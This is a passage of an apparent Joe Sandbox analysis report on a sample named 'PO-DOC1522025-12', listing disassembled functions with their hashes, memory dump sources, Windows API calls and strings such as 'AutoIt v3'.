                                                                                    • Instruction ID: abb4fa19f4c0f144d4f4190745f4a868e90c245555971a36b96474166b5bef9c
                                                                                    • Opcode Fuzzy Hash: 5b7920a7a468b866be1bff67274dde659e00ae2e74062c5add7fb69120171a93
                                                                                    • Instruction Fuzzy Hash: 17E04F72005601FEE7252B51FC06F7377A9EB04311F10882EF8A5844B1DB626CD0DB50
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00176766,?,?,00000008,?,?,0017FEFE,00000000), ref: 00176998
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 4c7ec43f57d194eb5991212e79e9231efe18bf36c56838513a315c1f787ebb02
                                                                                    • Instruction ID: 6f000df0bcc62ea39bd610a19982691989ef2d069ab1d9db378187b5dbbd8306
                                                                                    • Opcode Fuzzy Hash: 4c7ec43f57d194eb5991212e79e9231efe18bf36c56838513a315c1f787ebb02
                                                                                    • Instruction Fuzzy Hash: 52B12931610A099FD719CF28C48AB657BB0FF45368F25C698E99DCF2A2C335E995CB40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: c2c50ac9a83e1c4662e9f979807399735548f3383686bcb77786b98e00a1fb5c
                                                                                    • Instruction ID: e91e4945e1bf1a2c3ba3518efafd517b3755ba2ce7726efc5cacc1ad85d88a15
                                                                                    • Opcode Fuzzy Hash: c2c50ac9a83e1c4662e9f979807399735548f3383686bcb77786b98e00a1fb5c
                                                                                    • Instruction Fuzzy Hash: 17126D71904229DFCF24CF58C880AEEB7F5FF48710F15819AE859EB255EB309A85CB90
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 001BEABD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: 743806e2cdeea054bb6eb6514c2eed248bdf92f90e5426142f7b363d25ddf5d9
                                                                                    • Instruction ID: 0f2744a009a2816a044936346b9b7f75e2a311ab3303a78a654966337c58ec35
                                                                                    • Opcode Fuzzy Hash: 743806e2cdeea054bb6eb6514c2eed248bdf92f90e5426142f7b363d25ddf5d9
                                                                                    • Instruction Fuzzy Hash: 91E04F312012049FC710EF69D844EDAF7EDAFA8760F008816FC49CB3A1DB70E8408B90
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001603EE), ref: 001609DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 8496916e2031d0d86dee912fa1534a16462d435cdd112a5848de3db6c116e6a2
                                                                                    • Instruction ID: 53ee51feeaf869dc32dce88c387522920ce8648cae3afb2c0f42e35868e70501
                                                                                    • Opcode Fuzzy Hash: 8496916e2031d0d86dee912fa1534a16462d435cdd112a5848de3db6c116e6a2
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                    • Instruction ID: 418aae584077b7f435f1242f9378701294227c45e8482d7e16ebf2a245c28f45
                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                    • Instruction Fuzzy Hash: 4D51777160C7059BDB3889788C5EBBE63DD9B2235CF180A09E882D72C2CB15EE71D356
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0&!
                                                                                    • API String ID: 0-1419620344
                                                                                    • Opcode ID: 43469d8c244f55b32967cbe7189211f24f8883fcc5b04a1932687fa1acc781e6
                                                                                    • Instruction ID: f83aad06b7056ae799c8af964916890489c292ccbf61485bfdff114e1f6493c7
                                                                                    • Opcode Fuzzy Hash: 43469d8c244f55b32967cbe7189211f24f8883fcc5b04a1932687fa1acc781e6
                                                                                    • Instruction Fuzzy Hash: 7321A8326205158BD728CE79C8166BA73E5A764310F15862EF4A7C37D0DF35A908C740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a18eb8aefda32e9f2cd9994f7d70d92970e4a52fbce395a90b4c2ae266b0437b
                                                                                    • Instruction ID: 6300bcb1ee5865f4feafc62022c314af71245c680f04150fb822a920c4795eeb
                                                                                    • Opcode Fuzzy Hash: a18eb8aefda32e9f2cd9994f7d70d92970e4a52fbce395a90b4c2ae266b0437b
                                                                                    • Instruction Fuzzy Hash: 8932F022D29F414DD7239634CC72339A69DAFB73C5F15D727E81AB9DAAEB2984C34100
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c35bbaf75acc9f5407b43b23d9eac2dbb820a9f8bb7e1af56421969bd5092b1
                                                                                    • Instruction ID: 2c93529c94911d5230de55de92e1e3da821f6e75faa36e66dfa8b187cc9ed387
                                                                                    • Opcode Fuzzy Hash: 9c35bbaf75acc9f5407b43b23d9eac2dbb820a9f8bb7e1af56421969bd5092b1
                                                                                    • Instruction Fuzzy Hash: 55324831A00255CFDF28CF68C4946BD7BA1EB45355F29816AD8EACB292E330DD85DBC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3fc6433cfb387cab9d1c474e6abdd2a26e8e80f127f44ecd8742fca969a933ea
                                                                                    • Instruction ID: d8aece26733260cc8be88075c7a8c31e179b13d78f54f192c37b848b133ee278
                                                                                    • Opcode Fuzzy Hash: 3fc6433cfb387cab9d1c474e6abdd2a26e8e80f127f44ecd8742fca969a933ea
                                                                                    • Instruction Fuzzy Hash: E522A270A04609DFDF14DF64D881AAEB7F6FF54300F244529E816E72A1EB369E15CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2527b258ba138ccec0412f3ca835983c944438fe8785663d61813bdfbdf78c4b
                                                                                    • Instruction ID: 7a8b27500df56ac18505e8cb6a5a82c5d8080611502b77bee8000e3541fa717a
                                                                                    • Opcode Fuzzy Hash: 2527b258ba138ccec0412f3ca835983c944438fe8785663d61813bdfbdf78c4b
                                                                                    • Instruction Fuzzy Hash: 4C0295B1E00205EFDB04EF64D881AAEB7F5FF54300F118169E816DB291EB71AA65CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b3f9e476ef45f889762b840d682d2d264a9b8c80951358764e0511bd22aac0a
                                                                                    • Instruction ID: 579f48a34205f4943f764b5e11bcb6a5cf0a7ac56d41965876cecde91d000803
                                                                                    • Opcode Fuzzy Hash: 8b3f9e476ef45f889762b840d682d2d264a9b8c80951358764e0511bd22aac0a
                                                                                    • Instruction Fuzzy Hash: 90616B7120870996DE38AA6C8DA5BBE6394DF5170CF280A1AEC43DB2C1DB51DE72C355
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 61a299346b93be792ab894417f6b6ab3247a807926a604443819ce23323bae6b
                                                                                    • Instruction ID: 6b1ecc3f5881b5b7d08e7104dc6a4f92939a77eda4f80554cbf9e1eda6b36339
                                                                                    • Opcode Fuzzy Hash: 61a299346b93be792ab894417f6b6ab3247a807926a604443819ce23323bae6b
                                                                                    • Instruction Fuzzy Hash: CD61993120870966DF399EA89C91BBF2384EF5274CF200D5AE943CB2C1EB129D76C311
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction ID: f7e8e3667ef77b23a92df031b5a3f245e2b83c98e9a9be5e25235e7308fc8bef
                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction Fuzzy Hash: FE41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction ID: c7bfd97aaba13cd02979c55bbc00ab599cb70a725e4559ccc256cd96c75e501a
                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction Fuzzy Hash: D0018079A00109EFCB44DF98C5909AEFBB5FB58310F208599ED09AB301D730AE41EB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction ID: d268271d27e7fcc5fb22ec4abec7df53581880646495dea06a1b6ca8fb620dd5
                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction Fuzzy Hash: 5A019279E01109EFCB44DF98C5909AEFBB5FB58310F208599ED09AB301D730AE51EB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 001C2B30
                                                                                    • DeleteObject.GDI32(00000000), ref: 001C2B43
                                                                                    • DestroyWindow.USER32 ref: 001C2B52
                                                                                    • GetDesktopWindow.USER32 ref: 001C2B6D
                                                                                    • GetWindowRect.USER32(00000000), ref: 001C2B74
                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001C2CA3
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001C2CB1
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2CF8
                                                                                    • GetClientRect.USER32(00000000,?), ref: 001C2D04
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001C2D40
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D62
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D75
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D80
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001C2D89
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2D98
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001C2DA1
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2DA8
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 001C2DB3
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2DC5
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,001DFC38,00000000), ref: 001C2DDB
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 001C2DEB
                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001C2E11
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001C2E30
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C2E52
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001C303F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: 8146bf7c11a5c19e0220cf7c8a80cb2381445aac4a34373ab09afd608f0a5e0d
                                                                                    • Instruction ID: 6b11f97b9be6f70c9187a0a5c41605fae505077e6a5bd8de4dea5317da30caa0
                                                                                    • Opcode Fuzzy Hash: 8146bf7c11a5c19e0220cf7c8a80cb2381445aac4a34373ab09afd608f0a5e0d
                                                                                    • Instruction Fuzzy Hash: 87027C71901219EFDB14DF64DC89FAEBBB9EB58310F008559F915AB2A1CB70ED41CBA0
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 001D712F
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 001D7160
                                                                                    • GetSysColor.USER32(0000000F), ref: 001D716C
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 001D7186
                                                                                    • SelectObject.GDI32(?,?), ref: 001D7195
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 001D71C0
                                                                                    • GetSysColor.USER32(00000010), ref: 001D71C8
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 001D71CF
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 001D71DE
                                                                                    • DeleteObject.GDI32(00000000), ref: 001D71E5
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 001D7230
                                                                                    • FillRect.USER32(?,?,?), ref: 001D7262
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D7284
                                                                                      • Part of subcall function 001D73E8: GetSysColor.USER32(00000012), ref: 001D7421
                                                                                      • Part of subcall function 001D73E8: SetTextColor.GDI32(?,?), ref: 001D7425
                                                                                      • Part of subcall function 001D73E8: GetSysColorBrush.USER32(0000000F), ref: 001D743B
                                                                                      • Part of subcall function 001D73E8: GetSysColor.USER32(0000000F), ref: 001D7446
                                                                                      • Part of subcall function 001D73E8: GetSysColor.USER32(00000011), ref: 001D7463
                                                                                      • Part of subcall function 001D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001D7471
                                                                                      • Part of subcall function 001D73E8: SelectObject.GDI32(?,00000000), ref: 001D7482
                                                                                      • Part of subcall function 001D73E8: SetBkColor.GDI32(?,00000000), ref: 001D748B
                                                                                      • Part of subcall function 001D73E8: SelectObject.GDI32(?,?), ref: 001D7498
                                                                                      • Part of subcall function 001D73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001D74B7
                                                                                      • Part of subcall function 001D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001D74CE
                                                                                      • Part of subcall function 001D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001D74DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                    • String ID:
                                                                                    • API String ID: 4124339563-0
                                                                                    • Opcode ID: 3090c3ee388b60a910fa22f11e1470cc4368973ccef940a2d7e68b8235477112
                                                                                    • Instruction ID: 6ef2aa0c0fe5f2ee0fdb3bdc05e4841a27ddfd5486aaa62378ea042723fbc2c2
                                                                                    • Opcode Fuzzy Hash: 3090c3ee388b60a910fa22f11e1470cc4368973ccef940a2d7e68b8235477112
